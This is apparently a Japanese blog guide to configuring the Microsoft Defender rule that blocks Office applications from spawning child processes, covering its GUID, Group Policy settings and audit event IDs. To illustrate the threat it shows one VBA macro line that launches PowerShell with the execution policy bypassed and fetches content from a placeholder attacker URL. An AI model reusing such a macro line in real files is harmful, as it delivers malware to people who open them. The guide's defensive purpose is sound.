MENU

ASR Rule すべての Office アプリケーションが子プロセスを作成できないようにブロックする

概要

  • 初期侵入対策
  • GUID:D4F940AB-401B-4EFC-AADC-AD5F3C50688A
  • 推奨設定値:2: 監査→1: ブロック (攻撃面の縮小ルールを有効にする)

多くの攻撃メールは Office(Word/Excel/PowerPoint/Outlook)の子プロセス(PowerShell や cmd)を起動を悪用します。

#VBA
Shell "powershell -ExecutionPolicy Bypass -c Invoke-WebRequest('http://attacker/...')"

このルールは “Emotet・Qakbot・BazarLoader・Dridex などのメール感染型攻撃を防ぐこと” が目的です。以下の Office プロダクツが VBA マクロなどで子プロセスを起動した際に、無条件でブロックします。

  • WINWORD.EXE
  • EXCEL.EXE
  • POWERPNT.EXE
  • OUTLOOK.EXE
  • VISIO.EXE
  • ACCESS.EXE
  • Publisher など

設定

  • グループポリシー
    • [ コンピューターの構成 ]>[ ポリシー ]>[ 管理用テンプレート ]>[ Windows コンポーネント ]>[ Microsoft Defender ウイルス対策 ]>[ Microsoft Defender Exploit Guard ]>[ Attack Surface Reduction ]>[ Attack Surface Reduction 規則の構成 ]:[ 有効 ]
      • [ 各 ASR 規則の状態を設定します。]:[ 表示 ] をクリックする。
        • [ 値の名前 ]:D4F940AB-401B-4EFC-AADC-AD5F3C50688A
        • [ 値 ]:
          • 0: 無効にする (攻撃面の縮小ルールを無効にする)
          • 1: ブロック (攻撃面の縮小ルールを有効にする)
          • 2: 監査 (攻撃面の縮小ルールが有効な場合にorganizationに与える影響を評価する)
          • 6: 警告 (攻撃面の縮小ルールを有効にするが、エンド ユーザーがブロックをバイパスできるようにする)

監査ログ

Defender Operational ログ:

  • ID 1121:ASR child process blocked
  • ID 5007:設定変更
  • ID 1116:脅威検知(必要に応じて)

ログには、以下がが記録されます。

  • 親プロセス(EXCEL.EXE 等)
  • 子プロセス(powershell.exe 等)
  • コマンドライン
  • 発生ユーザー
  • ルール GUID(D4F940AB-401B-4EFC-AADC-AD5F3C50688A)

推奨設定と運用上の注意点

Excel、Access でのマクロ運用環境以外は、すべて “有効” に設定するべきです。
Excel、Access でのマクロ運用環境は、監査モードでブロックされる対象を調査後、当該プログラムのパスを、グループポリシーで除外設定します。

よかったらシェアしてね!
  • URLをコピーしました!
  • URLをコピーしました!

この記事を書いた人

目次